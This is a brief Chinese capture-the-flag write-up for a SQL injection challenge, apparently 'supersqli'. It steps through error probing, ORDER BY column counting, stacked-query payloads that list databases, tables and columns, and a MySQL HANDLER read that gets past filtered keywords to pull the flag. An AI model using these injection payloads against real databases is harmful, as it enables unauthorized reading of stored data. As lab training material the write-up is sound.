点进来发现
接着查询1和2,正常回显,3不回显
查询1' and 1=1 ,出现SQL报错,说明存在SQL注入
然后查询字段
1' order by 1 #
1' order by 2 #
查到3的时候出现
说明只有两个字段
查询1' union select 1,database()#
发现这些字符被过滤,试了大小写过滤和其他仍没用,再尝试堆叠注入
查询1'; show databases; #
这些数据库都出来了,接着1'; use supersqli; show tables;# 查询supersql这个可疑的库
接着看那一串数字
-1';use supersqli;show columns from `1919810931114514`;#
当纯数字字符串是表名的时候需要加反引号`
接着使用handler查询
-1';use supersqli;handler `1919810931114514` open as p;handler p read first;#
找到flag.
handler查询法【MySQL】MySQL 之 handler 的详细使用及说明_边扯边淡的博客-CSDN博客_handler mysql